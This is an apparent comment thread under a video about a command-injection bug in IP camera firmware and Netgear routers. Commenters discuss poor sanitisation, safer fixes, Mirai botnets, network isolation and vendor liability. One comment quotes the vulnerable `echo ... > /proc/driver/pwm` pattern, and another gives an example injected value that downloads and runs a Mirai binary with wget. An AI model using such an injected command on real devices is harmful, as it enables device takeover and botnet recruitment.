this vulnerability shouldn’t even exist 

"If you are new here" are you sure who is what where? You are on my screen and on my time, I am not on your screen and on your time.

Need student discount too costly for Indian students from middle class family

Hey Ed, Why not create a course for reverse engineering?

Hey Ed, are your courses beginner friendly? I have been learning C and still very much a newbie. I am interested in your courses, mainly C and Assembly. However, you are so advanced in your knowledge that I am nervous about joining to find out that it is way over my skill level, etc. I really am looking for an assembly that is ZERO to Hero type of course....

is there a firmware that works on most cameras that is safe to use ?

@@martinzihlmann822 original

This is perfect. Well done sir.

But there’s no s

@@GREG_WHEREISTHEMAYO that's the joke

Love this

Basically impossible for regular people.

Regular "routers" don't allow you to even do that even if people knew how

​@@nicholasj3213Yeah and for many it would require new devices. Unless you made your purchasing decisions with that in mind, but the average person doesn't.

This. I had all my IP cameras placed into a VLAN that can only talk to one specific local IP which hosts my NVR software (Frigate), which runs in a non-privileged container (podman is great), on an SELinux-enabled RockyLinux 9 box. If an attacker can break in and out of this onion they can have all my data 😁

@andreffrosa That sadly is just a case of you get what you pay for, going with the ISPs wormbox or getting the cheapest option despite most people knowing someone atleast slightly technical person to ask for recommendations.

Not when they hire the lowest common denominator coders and don't do your own penetration testing and code reviews with security experts.

Hell, I've made batch files that do a better job at input validation than this.

@@CrimeyCenter that sounds... Grossly negligent

Exactly! This is a classic injection vulnerability. It might as well serve as an example of what not to do, and reminds me of several examples of what not to do when I learned how to do CGI programming in Perl in the 1990s. Why are they using the shell to do this? Why are they that lazy?

There's no good pay for embedded systems cybersec positions.

What's crazy is that there *is* sanitisation. Just above the offending line there is a line that removes character 0x22 from the input. That is the double-quote character, which would indeed be a way to attack the injection vulnerability. So somebody thought to defend against a possible injection, and still botched it. In this case, I would presume the LED value should be a number so just... Use %d instead of %s???

​@@pfqnietThere's technically at least one extra step required (strtol() or similar to parse the string to a number), but yes, not hard. Maybe some quick range checks for good measure. When validating input, always validate maximally. Of course, running shell commands is the wrong way to do this anyway. I would reject this code review and have a friendly chat with the author.

Always whitelist valid input and reject everything else. However you do it, doesn't matter.

@@pfqniet You can’t just change the %s to a %d; pcVar2 is a string (which is insane because they already are parsing it into an int). A better thing would be to use the iVar4 variable instead and then use %d. But even that is wrong. Look at what the commandline code is doing: writing a value to a file. This is pure laziness. The programmer should have just opened the /proc/driver/pwm file and written iVar4 to it. That would have removed even the possibility of a commandline injection since no shell would be launched. It even would be more efficient.

Reminds me of when I accidentally put a backslash at the end of a password (because it’s right next to the enter key) and due to lack of sanitization it crashed the whole system that it was running on. 😂 I’m not going to say which company but it was a massive one that put the services in the hands of 2 people who didn’t think to sanitize password fields

sounds like the opening to a song

It isn't a specific hole. That''s what she said.

Mirai, qbot and other families never stopped being active, due to there being hundreds of variants

camera vendors: meh (continues spinning in chair)

They care about profits and not security. Like seriously. Camera software isn't open source. There's no standards. How in the hell is the average consumer supposed to know. We need standards yesterday and a campaign to say just what is and what isn't acceptable.

mirai is MOST DEFINITELY still going on. bunch of servers still getting requests from the botnet to try and backdoor through /cgi-bin/

Yes. And there have been computer viruses that fixed vulnerabilities the vendors refused to address. There was at least one that I know of regarding an ISP router.

I think the worst of all possibilities is to have unencrypted firmware available without source. If the source was available, you at least increase the likelihood that security researchers may at least have a chance to catch bugs and propose fixes.

The golden rule in IT security is "obscurity is not security". This doesn't mean that keys should be published like microsoft likes do to "accidentally", but that the algorithm to protect something shouldn't rely on not being published. In the end it comes down to just desoldering the ROM with the firmware and reading its content. So, yes, every professional IT security expert will tell you that the Firmware should not rely on being a secret.

@@Adesterr If your point is that obscurity shouldn't be the entirety of your security strategy, we're in total agreement. My point is that, from a practical standpoint if making source available is off the table, obscuring the firmware provides some level of deterrence from the exploit being exposed. This along with diligent internal testing and code quality standards is a more reasonable security strategy than not obscuring the firmware.

"Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone?" - It is not more secure. More accurately, the question of whether open source software is more or less secure than closed software is unknowable because we don't know how secure either category really is. I would, however, point to Ed's 21 April 2024 video, "this is a warning to anyone using php", which highlighted a 24-year-old buffer overflow vulnerability in glibc. If "it can be audited by anyone" really meant superior security, then that vulnerability would not have persisted for 24 years. I do agree with your original point, however -- the firmware should be available, and security through obscurity is no security at all.

It's neither. If the code is secure, both people checking it for "secure" or "vulnerable" will find nothing. Now if it's NOT secure, and let's assume 100% competency, IF you have someone checking it for security they will spot it. IF. And IF it's any software with any decent amount of users, someone WILL be looking for vulns and spot it. The "many eyes" thing only works IF there's actually many (competent) eyes looking out for things...

My Guess was the R6400 because the PCB layout is different. Unless there is a revision of the R7000 that looks like the R6400 which i have never seen then i think it must be a R6400.

Or Tp-Link those were forever vulnerable routers :D

@@VladSuperKat Yupp...but you can change the firmware on them. The worst was the blunder when they changed the chipset from Marwell to some Broadcom crap: oh boy, are those vulnerable at the hardware level :D

Was about to guess Netgear. Welp

At least with a google search I could find photographs and articles about it, the shape of these Netgear routers is pretty recognizable. And I new about the trademark that it's known for the problems.

If they made no significant attempts at resolving the issue you probably could but the courts are notoriously behind the times on these issues. The other problem is how many of these products flooding Amazon are just overseas companies.

Software companies are notoriously exempt from liability. Almost every software product has a user agreement that basically tells you they are not responsible even if the software is entirely unfit for its purpose and accidentally blows up your house instead. The degree to which such user agreements can be uphold in the court of law varies, but in general it does. Judges know nothing about software so they rely on industry experts, who basically explain them it's some sort of extremely complex magic that cannot possibly come with any sort of guarantees.

@@jbird4478 Except that's for the software itself, not for the physical hardware product that just happened to contain that software. It's the responsibility of the manufacturer of the IoT device to figure this out. Either they develop their own stuff, or they can test open software, or they can hire a software company that's certified and has liability written in the contract. If an IoT device burns your house down, then it doesn't matter if it's a hardware problem or a software bug.

Go sue China....oh wait you can't

Judges decide any case however they want, including jury trials because they control exactly what the jury sees. So in the miu case they did not show the video of the 'children' attacking the old man only selected still photos, for example.

indeed. What's this whole echo and redirection stunt for anyway? Does the shell have higher priv than the cgi Factory binary or what?

@@timoadler6356 I'm guessing that the echo is just a shortcut in the code to writing to the particular file, as @TheRobbix1206 describes. I'm guessing that one can control the brightness by writing certain values into that particular file, just like one can control the swapiness of the Linux kernel by writing into '/proc/something/swapiness'. (I don't remember the specific file, but hopefully you still understand what I'm trying to say.)

​@@timoadler6356(I forgot:) That is, I don't think it has anything to do with privilege escalation. (I'd have to go back and watch the video again to make sure, by carefully noting what was executed and with what specific file(s).)

Yeah, it's as I thought. After zooming in (on my hand computer that has radios), the specific shell command is `echo DUTY_RATIO="%s" > /proc/driver/pwm`. So it looks like 'pwm' is a virtual file where one can write certain configuration to control the camera. (The camera reads that file, parses it, and acts accordingly.) So, while the kernel wouldn't prevent access to that file (as OP suggests), presumably the parser for that file would error out upon finding an arbitrary string instead of the expected literal atomic value (float? int? word?), much less executing said arbitrary string, which could be something like `DUTY_RATIO=wget 0.0.0.0 -o /mirai && /mirai`.

@TheRobbix1206 If the binary has permission to execute a shell command that writes to a file, then the binary should have permission to write directly to that file, so the kernel wouldn't deny opening the file (unless the effective user somehow got changed, but I don't see anything in the code that does that).

Buying smart devices is ironically a dumb thing to do.

@@makebreakrepeat quote

Replying. Agreeing. (algo bait)

This

Agreed

Had to zoom in and it was a bit fuzzy, but certainly legible. Thanks LLL

So it's writing the value to a file in /proc so that's a pretty standard way of passing things to a kernel driver but your point still stands... opening a file,writing a value and then closing it should not be considered challenging. No reason for that to be done as a system call.

@dantenotavailable Yes, I have no problem with the filesystem abstraction. That's just linux. Putting a command line interpreter in between seems risky, and passing unsanitized data to it was a mistake. My guess is the task of writing this trivial bit of functionality was delegated to the most junior of programmers and never reviewed. This is why we are doomed to security audit meetings 😑

guess it is cheaper to get someone to write a bash script than hire a competent C programmer :o)

@@dantenotavailable Aye. This is how you'd do it in Plan9 or Inferno. And in those it would work safely as every process lives in its own namespace there.

You google once. "pass http param to bash". then use for everything and bobs your uncle. I didn't want to make any more jokes about that. Sorry 'bout that.

security by obscurity is always safe until isn't, at which point it REALLY isn't

Why does this security camera have an operating system like linux to begin with? All it needs is 1) a bootloader, 2) minimalist networking software, 3) video encoding stuff, and some encryption algorithm that can be part of the networking binary or the video binary. The whole thing could be a single binary and be fully embedded, or it can be a few binaries running on freeRTOS. Why would a camera need wget? Why would it need bash? What's the upgrade path of "a camera"???

@@sasjadevries A crappy standalone camera I bought 10 years ago had its own embedded HTTP server, so you could configure all sorts of options. Not all of them connect to a central controller.

@@sasjadevries lets you do facial recognition and stuff locally, and compress the archives and so on. If you are doing bunch of stuff like that, at a point you are better off just using linux, cause you just let the user put on whatever they want on it instead of writing custom software and drivers. That said just don't connect your stuff directly to the internet. It's gonna get hacked.

@@mapu1 That is a good point, but with a catch. I would rather do "local" object recognition on a server that multiple cameras connect into. Mix and match any server with any software and any camera, without vendor lock-in. The cameras could be just wired analog ones, or at most something digitally compressed. Doing all the processing on the camera itself would make sense if you install the camera in a way that it can be jammed, because it has to be wireless, because it's on moving subject. Or if you only need one or two cameras for your property, and have no plans for expanding surveillance later.

I'm a mobile user agent, and I approve this message

This started in the 70s where software was given special consideration. No consumer protections, licensing restrictions, etc. Maybe these things and CrowdStrike may change things.

@@glynnetolar4423because everybody and their mom can write software and publish it. This is anti elitist, anarchistic and awesome for all of us. Medical device software needs to be certified bc it can kill ppl but nobody got ever killed by a software bug in a surveillance cam.

It's supply and demand. The need for software developers has grown exponentially (even logarithmically) over the last few decades. There are literally tens of millions of developers all over the world, and I would bet 99% of them do not have anything near a masters degree in engineering. Even if all companies required them to get advanced degrees and were willing to pay for that, there just aren't enough schools that could handle the load. And let's face it, most developers just start out working on business logic in spreadsheet macros, or modifying JavaScript. Eventually, they are asked to work on something that is over their head.

There are quite strict rules for certain categories of software, OD-178, iso26262 and the whole safety-critical branch for medical equipment, aviation, etc. Then the smarter governments usually have certifications for software handling personal data, payments, etc. But this stuff should just be broader, such that you had at least some of this for software in household appliances.

@@andrewpredmore2968 I would argue, that this demand is unjustified. Firstly, most agile developers are like stacking a framework on top of a framework, for something that could have been vanilla html+css generated from some markdown. Or they are shell scripting and pipelining filtering software A into filtering software B into conversion software, for what could have been a single shader. Secondly, these soydevs mess up, so you need another soy dev fixing (i.e. ducktaping) the other's work, and a scrum master and a selfproclaimed tester. Thirdly, even a small businesses, like a local bakery with 3 locations in your city, feels like it needs it's own app, because a website and PWA is not enough. And why would people make a few good tools, when you could make thousands of mediocre ones? Finally, that spreadsheet script is usually for a job that could have been automated away, and shouldn't have been done in a spreadsheet to begin with. p.s. ducktape is not a typo, "duck" is the canvas that the tape was made out of, before it was used for ducts😆.

Nighthawk lineup are insecure.

@@YaySyu What about when you run DD-WRT or OPEN-WRT latest kernels?

R6700

Why not just install OpenWRT?

@@MelroyvandenBerg You cant do it on most of them without flashing the board. I had to open mine up to flash it.

What part of "unpatchable" do you not understand?

@@bits360wastaken what part of people don't have the power of prophecy do you not understand.

@@bits360wastaken But... It is fixable with a new firmware version release. As long as users install the new firmware version, the issue is patched. Yes, it technically is unpatchable because they can't just send the update to the user's device to auto install it, but the post calling it unpatchable is a red herring to begin with as it makes people assume that the issue can't be fixed at all, which is not the case.

@@GameDevMadeEasy they could abuse the bug to force the system to download and install a firmware upgrade.

@@EricDMMiller Companies can't do something like that as it is unethical and could lead them into legal hot water.

Install Fresh Tomato and move on with your life.

Your cameras aren’t safe, either, Mr. 2000s era pre-emoji smiley face

Werd. Mine are completely segregated...have their own router and everything.

@@RabbitWatchShop wait until you hear about MSN Messenger and how emojis already existed back then during the early 00s. Some people don't like to use image based smileys / emoji.

@@RabbitWatchShop ok mossad

That's why I don't use cameras. Actually, the real reason is that I don't find myself all that photognic anyway.

I hope this is sarcasm

@@Rudxain yes and no. Saying they did sanitize was sarcasm. The jab at the lack of security in IoT wasn't - there is a horrible lack of security across the board

@@marklonergan3898 LMAO

Came down here for exactly this. They were so close, just use %d and that int var instead of the string... definitely a copy-paste-compile "hey it works" SHIP IT!

A shell that no one would normally see no less. I worked security at a company I'm not going to name for a specific reason: guess what cameras and software they used? To get access to that print out, you gotta jump through some menus and you lose screen real estate, which is something you don't want when you're watching cameras for thieves and accidents. However, we had 3 monitors, so I'd have the camera's on 2 of them as I could fit just about every single camera in the whole warehouse that way, and still see what was happening, and on my left most monitor I had the thing that was displaying these messages and a notepad open. I'm also thankful that they had it set up in a way that my layout was tied to my account on their network, so when I logged into the computer and ran the software everything was already the way I had it, and I didn't have to worry about other guards messing with my shit. I actually was able to notify the people in charge of security multiple times that cameras were malfunctioning before it showed in the software by having that thing up, but the average user would have no idea it was there (I even had to teach the head of security how I did it, because she had no idea it was a thing).

I read "Fridge" instead of frigate and got really confused like "Do you use your fridge as a security monitor or something"

ZTNA & isolated VLAN for IoT

But how will I cook my food if my microwave can't connect to the Internet? How will I heat my home if my thermostat can't connect to the Internet? How will I know when my laundry is done if my washer and dryer can't connect to the Internet?

@@nomore6167 I mean, I get that you're joking, but it'll get to that point! It's already true that, where I live, I need to have a cell phone with its own separate data plan in order to activate a new modem for my cable broadband service. It's just ludicrous, but it's true....

@@MSThalamus-gj9oi Sadly, I believe you're right that it'll eventually get to that point. Either probably be a combination of people's laziness/"convenience" (wanting to be able to access everything from their phone), company greed (data collection / analytics for everything), company control, and planned obsolescence. Personally, I think it's bad enough right now when we need to go to a company's website to download the user manual for pretty much everything.

@@MSThalamus-gj9oi With regard to needing a cell phone to activate a new modem for your cable broadband service, what's the reason for that (if you don't mind me asking)? If it's because it requires an app, then it's even worse than simply requiring a cell phone; it'll probably require a relatively new cell phone because most companies will support only the latest device OS and maybe the one before that. I'm at that point right now with Capital One, my credit card provider. I have an iPhone 6s. Sure, it's 8 years old, but it does everything I need it to do. Except Apple doesn't allow this phone to upgrade to iOS 16.0 or above, and the Capital One app now requires iOS 16.0 or above. More accurately, the app says it supports my phone, and it will install on my phone, but when you open it, it says you need to upgrade to the latest iOS. So I lost the ability to get realtime notifications (about new charges, payment confirmation, fraud alerts, etc) and control my credit card from my phone simply because I refuse to buy a new phone.

_Especially,_ with your webcam. I have a piece of blue tape over my MacBook’s camera, yes.

@@RubyCascade Here is some info that I wish I didn't know about: Search for the tag "hacked camera" in adult sites. That raises our paranoia to levels high enough that we want to warn all of our friends about keeping cameras on.

@@RubyCascade Once upon a time (10+ years ago) I was told that macbook cameras couldn't be powered without the green light turning on so that you knew it was being used. Later on I was told that it had been true but was no longer true, and could potentially be hacked at a firmware level. I have no idea of the validity of either of those claims.

@@DavidTriphon If you don't have a switch that physically cuts power to it, then it can totally be controlled by software :/ You can actually buy smartphones whithout camera and even microphone (so you need a headset to even use it as a phone). You can even order them to be shipped in tamper-evident packaging :)

@@reaperinsaltbrine5211 Those are prime targets for supply chain attacks, and factories that make consumer stuff arent profiling and hand picking people to assemble shit. I'd actually avoid that stuff like the plague if i was you. Tamper-evident packaging is just straight up marketing, its an illusion.

I had a legal and ethics in computing course during the semester that the October 2016 Dyn ttack occurred. My group's assigned topic had to do with IoT devices. We had half of our project handed to us on a silver platter with that attack.

apple IOS ? 🤣

@@user-nl2ho9gk3y "Apple iOS"

Smart device -> Dumb Device

> They could've got away with this if they used single quotes as these are not parsed by the shell. Then the attacker can just inject a single quote to close the string and follow up with whatever command they please anyway

@@patsonical They did this absolute minimum of removing quotes

I think it is unpatchable in the sense that there won't be a patch available because it is a discontinued product

It looks like I was a chump who bought one back in the day too 😭

​@@TeejMcSteezDude I connected my old nighthawk 6 months ago and in my router logs was a message from the shadow server foundation warning me that they detected a vulnerable router with their scanners. I found the message because my computer caught ransomware and I was investigating logs. Look them up, im serious. it was terrifying

This is why I hate Unix

@@supercellex4D lol what? windows has the same things lol

Instead of snprintf + system, they could have done fopen + fprintf + fclose, but that's one line more to type, probably too lazy to do it

@@supercellex4D blame the devs for their bad practice? Nah Blame the OS? Of course, because it's *definitely* the fault of the OS

@@not-pyroman Only Unix insists on magic files over documented predictable APIs

FreshTomato FW all I'm going to say.

Yup. Ever 5 years or so some company leaves passwords in plain text or allows SQL injection

Well, the ultimate step in the exploit was exploiting bash (actually sh, which depending on the system may or may not be bash).

@@__christopher__ what is counterintuitive but true: if the cgi is written in bash, you cannot exploit it, because instead of calling system() you just directly execute the thing. And if you directly execute, there is no exploitation possible.

To be fair: the SCADA world started way before globally connected networks were a reality and the sunk cost of all those systems make upgrading very costly. Also there are issues with QA and legal certfifications and the like.. Also: industrial control systems should be separated (if only for safety reasons) from other networks, with very narrow and well defined doors to the outside world. And frankly if operational safety and data/communications security are in conflict, I usually would pick safety.

@@reaperinsaltbrine5211, even with the separation, security was kicked down the timeline in the devices and PLC's. Until Stuxnet, there wasn't as big of a push for security, especially on the implementation side. At that time, manufacturers had considered and adopted it, but it wasn't used as it should have been. My comment was to focus on the implementation side, mostly, since that's what was carried over into home automation and IoT. Complacency in those industries was not a good example, yet was followed in the big IoT movement when it reached the market.

@@JarheadCrayonEater You have valid points. Although I think the "IoT" crappiness is more the result of extremeely low profit margins than anything else. Also people's preferring convenience over anything else. About complacency: may have a role in it in many places. The devices presented in the video are products of the typical Valley rent-seeking startup mentality. What frightens the crap out of me that this thinking is no creeping into medical devices, too, see NeuraLink: I don't want to have to do anything with those. Btw I do NOT have cameras, lights, fridge, anything that is allowed to communicate outside my network without expilcit permission. Hell, I deliberately stuck with good old mechanical lightswitches and a dumb fridge :D These things will fade out like any other fad, the question is after how many damage?

@@reaperinsaltbrine5211 , you have great points as well. It's not just one thing, as is usually the case. I'll just never forget when I started hearing the term "home automation" being used daily. I was a control system engineer on the pump stations in NOLA, among other industries, and just had to laugh at some of my stuff I saw coming out. Thinking "oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks".

@@JarheadCrayonEater oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks". Yeah...seems it is not only my experience. I sometimes surprised the whole thing didn't collapse on us yet :o) In the last ~20 years I mostly do infrastucture ops and the kludge-on-kludge patchwork I work with everyday LOL. Not to mention the kludges I put in there just to keep it rolling :/ New shiny things always get money....maintaining the guts of the system is an uphill battle :)

@@offtheball87 customers definitely want safety. It seems more like a leadership problem.

@1783W they do, but it's an invisible benefit. If your focus is delivering value every sprint, you can easily misinterpret that to be delivering visible value every sprint. It's a leadership problem, but I think it's broader than the leadership of any given organisation.

@@1783W You didnt even know this flaw existed until this video, why would fixing this bring any perceptible value to you? Customers dont care about this stuff, really. There should be a dedicated agency to regulate this kind of issue.

Bobby Tables*

nighthawk R7000

This is good I think. Cause the hackers who already found the exploit use it.. so if you do not say anything, that means these people can record you in your home ... if they tell everyone about it, those people can turn off the camera.

Do you really have enough trust in any company to think that they'd mention about massive vulnerability or do you prefer if everyone was living in ignorance?

@@kentacy69 Well, knowing that this wont be fixed and that there's probably something similtar in the gear we're all using right now, i'd be tempted to choose ignorance just so i can be a little less anxious about this stuff.

delete strings... from network hardware.................

@@gairisiuil And look where that got us

Other problem is you know the first time whatever you setup becomes an inconvenience they'll be blaming you and never want to deal with it again.